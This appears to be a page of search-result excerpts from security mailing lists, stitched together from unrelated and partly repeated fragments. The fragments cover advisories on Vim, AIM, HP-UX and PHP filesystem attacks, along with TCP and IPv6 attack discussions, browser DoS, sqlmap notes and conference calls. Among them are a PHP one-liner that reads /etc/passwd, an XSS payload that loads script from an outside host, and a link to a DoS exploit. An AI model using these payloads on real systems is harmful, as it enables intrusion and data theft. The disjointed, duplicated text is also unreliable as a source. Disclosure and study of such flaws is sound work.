Next Page >>
work
php -r 'include("/etc/passwd/");'
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
As you can see the file is succesfully included (it works with every
single filesystem function of PHP that makes use of _php_stream_fopen()
and similiar functions).
This is also part of the vector discovered by barbarianbob, while he
uses it for different purposes from what I initially thought.
of ``eval'' in some other languages. Throughout Vim, arguments passed to
``execute'' are not sanitized properly. This can lead to arbitrary code
execution. We will show several exploits which execute arbitrary code upon
opening a crafted file with the ex(1), vim(1), or view(1) commands. Only in
few cases will we explore the possibility of remote exploitation. We will
present fixes/workarounds to some of the vulnerabilities.
The archive with code that is a part of this advisory can be found at
``http://www.rdancer.org/vulnerablevim.tar.bz2''.
5. *Non-vulnerable packages*
. Microsoft virtualization products that are based on Hyper-V technology.
6. *Vendor Information, Solutions and Workarounds*
This issue was reported to Microsoft in August 2009. The vendor has
acknowledged the report and after extensive analysis indicated that it
plans to solve the problem in future updates to the associated products.
Hi,
Just wanted to add a quick update on affected systems since I forgot to mention webservers along with wordpress versions in my advisory.
Some people are wondering why the vulnerability doesn't work on their system.
I'm pretty sure that the exploit won't work on web servers other than Apache (as they probably won't process extensions other than the last one). So not apache based servers are probably safe here.
Whether it will work on your Apache server or not depends on your mod_php configuration.
The exploit won't work on servers where PHP scripts handling has been configured as follows:
<FilesMatch \.php$>
SetHandler application/x-httpd-php
DoS:
http://websecurity.com.ua/uploads/2010/Chrome%20&%20Opera%20DoS%20Exploit.html
This exploit for chrome protocol works in Google Chrome 1.0.154.48 and Opera
9.52.
In Chrome occurs blocking of the browser. And in Opera occurs resources
consumption (CPU and memory).
> So you tell you discovered this issue as
> well and you informed vendors, but the only vendor who really has RA
> support so far is Cisco, and they did not know.
We had worked on this thing for a while. IIRC, I talked with a few guys
about this in November 2010 or so (including, IIRC, some guys involved
in NDPMon)-- For instance, I posted on the ipv6ops mailing-list (in
November/December 2010) a few comments noting that RA-Guard could be evaded.
(And, FWIW, vendors have been sitting on a number of other ND issues
Protect to 2 for the best protection against SYN attacks. This value
adds additional delays to connection indications, and TCP connection
requests quickly timeout when a SYN attack is in progress. This
parameter is the recommended setting.
NOTE: The following socket options no longer work on any socket when you
set the SynAttackProtect value to 2: Scalable windows
-----
IIRC? This is called the "Silly Window Syndrome", & this is a way, in
I) Introduction
This is the second part and continuation of our previous "PHP filesystem
attack vectors" [1] research.
Working with s4tan and ascii on the "SugarCRM 5.2.0e Remote Code
Execution" advisory [2] we noticed a strange behaviour on Windows OS:
trying to upload a file named "a.php." results in just "a.php".
Analyzing this we noticed that every time an application, or manually,
was trying to open or save a file with one ore more dots at the end,
and Opera (http://websecurity.com.ua/3194/). Or like DoS vulnerability in
Internet Explorer 7 (http://websecurity.com.ua/2872/), which is similar to
DoS vulnerabilities in Firefox, Opera and Chrome
(http://websecurity.com.ua/2456/), all of them are printing DoS attacks.
> This will ONLY work if FireFox does NOT know which program to use.
It's interesting, because as I understand from your first information that
if works in Firefox (via Chrome) and from your previous text ("that FireFox
knows exists on the target operating system"), it must work if Firefox does
KNOW about which program to use. But in your case DoS effect is better when
Don't worry about how bad guys will be placing of JS code or page with
iframes at web site for this attack - it'll be their own problem. And if
they want they will do it. And after they placed attacking code (JS or HTML)
on target-site, then it'll be already a problem of users of this site (which
will can not work with it) and admin of the site (which in addition to
problems with working with the site, also will left without visitors on his
site). There are always vulnerabilities on different sites which can be used
for this attack. And also e-mail vector mentioned by Vladimir can be used.
> Its called the "infinite loop".
Max Moser wrote:
> Dear Listmembers,
>
>
> Today the team remote-exploit.org together with Dreamlab Technologies likes
> to release another piece of uniq research work.
>
> Although the trend in wireless communication in peripheral devices such as
> keyboards and mice is moving towards Bluetooth, market leaders such as
> Logitech and Microsoft rely on cost-efficient, tried-and-tested 27Mhz radio
> technology.
maybe I am making a huge mistake for responding to your message, but
let see. this is what I think about security in depth in a bit more
detail.
let say that we have a wireless network which is guarded by "security
in depth" network administrators. the first thing they will do is to
secure the actual network by some massive segmentation exercises...
then the connection with enhanced privacy/encryption schemes (WPA2).
They will put more layers on the top of that. For example, the users
need to authenticate with client-side certificates. Now the network
Potential Security Impact: Local unqualified configuration change
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP-UX running the Ignite-UX or the DynRootDisk (DRD) get_system_info command. This command can change system networking parameters without notification.
References: none
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running the Ignite-UX vC.7.0, vC.7.1, vC.7.2, vC.7.3 or the DynRootDisk (DRD) vA.1.0.16.417, vA.1.0.18.245, vA.1.1.0.344, vA.2.0.0.592 get_system_info command.
new technology also developed by AOL and available for the public in the
form of a "light IM client".
A vulnerability was discovered in these three popular versions of AOL
Instant Messaging software, AIM 6.1 (and 6.2 beta), AIM Pro and AIM Lite,
which expose workstations running the IM clients and their users to
several immediate high-risk attack vectors. To support rendering of HTML
content, the vulnerable IM clients use an embedded Internet Explorer
server control. Unfortunately they do not properly sanitize the
potentially malicious input content to be rendered and, as a result, an
attacker might provide malicious HTML content as part of an IM message to
new technology also developed by AOL and available for the public in the
form of a "light IM client".
A vulnerability was discovered in these three popular versions of AOL
Instant Messaging software, AIM 6.1 (and 6.2 beta), AIM Pro and AIM Lite,
which expose workstations running the IM clients and their users to
several immediate high-risk attack vectors. To support rendering of HTML
content, the vulnerable IM clients use an embedded Internet Explorer
server control. Unfortunately they do not properly sanitize the
potentially malicious input content to be rendered and, as a result, an
attacker might provide malicious HTML content as part of an IM message to
On 31-jul-2007, at 0:42, Hans Wolters wrote:
> Hi there,
>
> Anyone that knows how to contact responsible persons at uat.edu?
> root@ and security@ do not seem to work.
>
Thanks all for your suggestions. Current state:
abuse@ does not work and is listed in rfcignorant (since April this
Call For Papers -- BADGERS 2011
=============================================
The Program Committee for the first EuroSys Workshop on Building
Analysis Datasets and Gathering Experience Returns for Security (BADGERS)
invites you to submit your work.
Paper submissions are due January 31, 2011, 11:59 p.m. PST.
More information about the workshop can be found at:
=======
Along all the takeover features introduced in sqlmap 0.7 release
candidate 1, some of the new features include:
* Adapted Metasploit wrapping functions to work with latest 3.3
development version too.
* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
* Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or
--os-bof is selected) when running under Windows because msfconsole
and msfcli are not supported on the native Windows Ruby interpreter.
Good geeks ...not gook geeks.
It's not a racial slight, it's spellchecker not working and I didn't
realize I spelled it wrong. My deepest apologies if anyone reads that
wrong.
Hisashi T Fujinaka wrote:
> On Thu, 17 Sep 2009, Susan Bradley wrote:
>
>> <jaded mode off>
> :) In the end I realize, it sounds like a total over-haul of the TCP/IP
> stack is required; but does it really have to? Really?
>
> How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
> suggesting switching to an iptables based protection along with a registry
> tweak... ahh the good ol' batch firewall :) Would this actually work as a
> viable work-around? I realize M$ stated this as such, but given their
> current reputation it's really hard to take their word for anything these
> days :P
>
> What free/cheap client-level-IPS solutions block this current attack? Any
http://www.cpni.gov.uk/Docs/tn-03-09-security-assessment-TCP.pdf)
Earlier this year we published an IETF Internet-Draft version of this
document (available at:
http://www.gont.com.ar/drafts/tcp-security/draft-gont-tcp-security-00.txt)
in the hope of having the IETF further work on the TCP security paper UK
CPNI had published.
My personal take (possibly biased, since I am the document author)
is that this document has been the result of a lot of work (including
the work of the many peple that reviewed the CPNI version of the
:) In the end I realize, it sounds like a total over-haul of the TCP/IP
stack is required; but does it really have to? Really?
How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
suggesting switching to an iptables based protection along with a registry
tweak... ahh the good ol' batch firewall :) Would this actually work as a
viable work-around? I realize M$ stated this as such, but given their
current reputation it's really hard to take their word for anything these
days :P
What free/cheap client-level-IPS solutions block this current attack? Any
> :) In the end I realize, it sounds like a total over-haul of the TCP/IP
> stack is required; but does it really have to? Really?
>
> How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
> suggesting switching to an iptables based protection along with a registry
> tweak... ahh the good ol' batch firewall :) Would this actually work as a
> viable work-around? I realize M$ stated this as such, but given their
> current reputation it's really hard to take their word for anything these
> days :P
>
> What free/cheap client-level-IPS solutions block this current attack? Any
Hey man - hope all is well.
FYI- I tried your example file and by default nothing worked on Windows 7. The "loading and embedded file" says "this file is blocked", The file spawn requires a script prompt with a "automation error" after that, the windows control panel didn't launch at all, and the files required me to save them, etc.
The text from the uri handler did work, but I'm not sure what the ramifications of that are. Oh, the Action Panel did show up.
I agree this isn't an "exploit" but I guess it is somewhat interesting. Of course, downloading random .chm files is akin to downloading any remote content-rendering document, except that .chm won't automatically run from the internet in the first place, even with your rendering code in it that must be accepted by the user to load in the first place.
As such (again, notwithstanding the mild interest around it) I'm confused by the "This was the response I expected" comment because if I read it right, it sounds as if you are being condemning for some reason. Are you saying "this is the response I expected" because it is the correct response and you are aware of what would be required to push out supported hotfixes for low impact issues, or are you saying "this is the response I expected" because you somehow think it SHOULD be hotfixed, but is not, and that is "typical" (as in "irresponsible") or something like that?
tries to call a function (at +2Ch on IE 6, +30h on IE 7) from the
vtable. This makes exploitability completely dependent on the
system's version of MSHTML.DLL, and all but rules out successful
exploitation in 64-bit Internet Explorer.
The mitigation works by replacing one function pointer in the vtable
with a pointer for which the low 2 bytes are 0xCCCC, but at which the
code is functionally equivalent. Legitimate virtual function calls
work will as usual, while exploitation attempts will arrive at EIP =
0xCCCCxxxx (not exploitable) rather than 0xyyyyxxxx (exploitable for
some yyyy).
-:: Ways of abusing the HTML Injection and XSS ::-
The following are examples of what you can input as first- and/or last-name:
"><SCRIPT SRC=//intern0t.net/.j>
- Works only in FireFox and NetScape 8.1-G (Gecko)
Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based
partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
Hello Thierry!
> Your saying above that this attack works if "Initialise and script
> ActiveX control not marked as safe" is ENABLED.
This Saved XSS hole works even with this option disabled (i.e. with default
settings). But when we want to use ActiveX in our code (e.g. for Code
Execution attack), than such problem occurs. It's bug in IE (when there is
preceding comment tag), which I found when researching possibility of making
CE via XSS in IE. So I found the workaround for this bug - to set up this
90126c7c 872628e7 839f3c40 92baf9a8 0000ffff Npfs!NpCommonFileSystemControl+0x17b
90126c94 81c27fae 839f3c40 92baf9a8 92baf008 Npfs!NpFsdFileSystemControl+0x19
90126cac 901736d0 90827482 9016562c 92baf008 nt!IofCallDriver+0x63
90126d30 9015a39b 83a01dd8 83a01da0 92baf010 srv!SrvSmbWriteAndX+0x9a1
90126d54 9016be8d 00000000 8c3236b0 00000000 srv!SrvProcessSmb+0x151
90126d7c 81e25472 00a01da0 9012d680 00000000 srv!WorkerThread+0x12c
90126dc0 81c9141e 9016bd61 83a01da0 00000000 nt!PspSystemThreadStartup+0x9d
00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16
Srv.sys is the driver that will process the received SMB packet, once the packet is parsed it is routed through the proper driver. In this case, npfs.sys (named pipe filesystem driver). Npfs.sys handles named pipe requests. Below we can see how srv.sys parses some important fields of the packet:
Dear Peter Watkins,
PW> I don't know how small the salt universe would need to be before
PW> precomputing dictionaries would be worthwhile (vs. having a botnet only work
PW> on crypted passwords already captured), but certainly the obviously weak
PW> srand(time(NULL)) code only helps the black hats. And with modern OSes
PW> providing reasonably good entropy sources, there's little reason not to
PW> "do it right". It's not the worst mistake I've seen, by far not the most
PW> dangerous. But it's sloppy of the Apache Group to have ignored it for half
PW> a decade.
by the special interest group Security - Intrusion Detection and
Response (SIDAR) of the German Informatics Society (GI). The
conference proceedings will appear in Springer's Lecture Notes in
Computer Science (LNCS) series.
DIMVA solicits submission of high-quality, original scientific work.
This year we invite two types of paper submissions:
* Full papers, presenting novel and mature research results. Full
papers are limited to 20 pages, prepared according to the
instructions provided below. They will be reviewed by the program
Next Page>>
|
